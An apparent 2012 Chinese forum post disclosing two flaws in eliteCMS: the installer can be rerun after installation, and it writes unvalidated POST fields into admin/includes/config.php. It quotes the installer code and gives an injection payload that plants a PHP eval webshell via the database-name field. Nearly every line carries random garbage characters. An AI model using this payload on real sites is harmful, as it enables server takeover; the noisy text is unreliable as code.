eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装: A7 n" Q/ ^5 q" @9 l
% ]2 W! i, b$ r5 W* T4 u4 g! x/ C, v
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php7 m! S7 Q7 ` L9 m
我们来看代码:: g" L6 p9 J3 ~3 q6 h# g9 h/ P
, L8 m% ?1 A1 P8 i9 y...
- ?5 m! P$ {& U( u# ]2 d5 _elseif ($_GET['step'] == "4") {, w: ^ A5 q5 u
$file = "../admin/includes/config.php";
O u0 t+ J7 h; P6 F6 U! \% x $write = "<?php\n";
, D2 A: m# T( o m+ ^5 j" _) A $write .= "/**\n";8 k( h+ |3 h! h) m, W
$write .= "*\n";
2 Z9 f- }1 Y) y, g0 A4 e $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
0 J/ o2 a+ V8 j/ z& w A...略...% x G5 z" F" {% C8 L2 X% A* ~9 \
$write .= "*\n";! O7 r$ Q% k0 H# W
$write .= "*/\n";
/ r9 V, K- Y' w# j, a2 I2 `0 W+ P $write .= "\n";5 l6 l' o6 v% N7 ?" H7 _, e
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
' S4 [! S; y( v/ {9 E0 E $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
# ]& e ?; P$ }# x8 p6 U $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
. |7 i4 c; n9 E $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";9 n( E+ Z' ~ e
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
. h% J2 e. A: y4 O1 Q $write .= "if (!\$connection) {\n";6 k I" e, f+ [ I0 Y/ `
$write .= " die(\"Database connection failed\" .mysql_error());\n";
& D; @" N& B5 S $write .= " \n";) \, M8 j/ U+ f3 _& X, j
$write .= "} \n";5 S# p1 u2 P9 ~& O1 ?
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
9 H1 O7 |1 _( f. e $write .= "if (!\$db_select) {\n";
8 ], ?: P' n8 a0 n4 J2 S $write .= " die(\"Database select failed\" .mysql_error());\n";
9 ^7 `6 U2 \0 A& P; b# _ $write .= " \n";* u! C+ b6 n* D3 V5 O
$write .= "} \n";
5 p- f8 S+ x2 a, G $write .= "?>\n";
6 m6 H9 U7 c( w7 M3 [) s) ` V1 _
$ |5 u+ t3 w, o" K( J) h2 Z $writer = fopen($file, 'w');4 u7 v% z2 |, s( W9 `) l7 \/ ~
...
) G6 n; x, e6 I- Z0 H5 t& G " h# T1 q3 p4 K+ J
在看代码:( l" e/ A/ Y, L' R$ ?7 U) E
' G+ t0 Y6 V, J3 b0 w$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
1 x2 O+ X& m7 ~0 {0 s* ]$_SESSION['DB_NAME'] = $_POST['DB_NAME'];5 \6 z3 O. T O' [$ [, l; v
$_SESSION['DB_USER'] = $_POST['DB_USER'];+ S% d" B6 p8 H. X. B. H4 o, h
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
* W2 S o; j6 N& ?* J: e 0 k) s* G1 Q8 R* a B7 f9 d9 d* f
取值未作任何验证# ]$ j4 y" k, v1 `
如果将数据库名POST数据:
9 r) S K2 Z4 o0 Z % B* e& o; p0 }/ t& }* \) @0 Z
"?><?php eval($_POST[c]);?><?php- a+ b9 @. t. ]4 O0 }7 T: _
8 o4 m3 j* l/ [3 m- E将导致一句话后门写入/admin/includes/config.php
3 ?0 H( x! E& X: [5 ]1 U |
发表于 2012-11-18 13:59:27
收藏
支持
反对